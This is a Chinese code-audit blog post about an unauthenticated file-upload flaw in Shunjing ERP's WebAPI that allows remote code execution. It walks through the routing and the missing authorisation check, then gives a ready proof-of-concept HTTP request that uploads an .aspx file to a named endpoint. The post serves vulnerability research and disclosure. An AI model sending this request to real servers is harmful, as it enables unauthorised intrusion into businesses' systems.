免责申明
本文章仅用于信息安全防御技术分享,因用于其他用途而产生不良后果,作者不承担任何法律责任,请严格遵循中华人民共和国相关法律法规,禁止做一切违法犯罪行为。
一、前言
某位师傅给我发了一个顺景ERP的代码,并且跟我说是最新版本的,我们来看一看。
这是顺景ERP的目录结构,我们肯定是进行查看WEBAPI这个目录,一般API节课出现安全问题的比较多。
那么把bin目录下的文件载入进来,我们开始吧!
二、路由分析
查看全局文件,其实这里可以看到是存在WebAPI当中的WebApiAppliaction当中的。
可以看到这个方法就是启动方法,其中的代码21行当中跟入这个类当中。
我们得到了对应的路由是如何进行传递的,看是跟入Controller。
三、漏洞分析
在Controller当中
可以看到存在一个RequestAuthorize的注解一样的东西,这个就是鉴权,我们寻找没有这个注解一类的东西的方法处。
在上面可以看到一个方法可以直接进行文件上传,并且没有对应的检测,可以直接上传aspx文件。
四、漏洞验证
请求包如下:
POST /api/cgInvtSp/UploadInvtSpFile HTTP/1.1
Host: xxxx
Content-Length: 155
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Origin: xxxxx
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9C4zXhY2gc6dn9QX
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer:
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
------WebKitFormBoundary9C4zXhY2gc6dn9QX
Content-Disposition: form-data; name="file"; filename="1.aspx"
1
------WebKitFormBoundary9C4zXhY2gc6dn9QX--
详细介绍
知名小朋友,公众号:进击安全想学代码审计的师傅进来了!
原文始发于微信公众号(进击安全):某NET代码审计前台RCE--漏洞分析
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论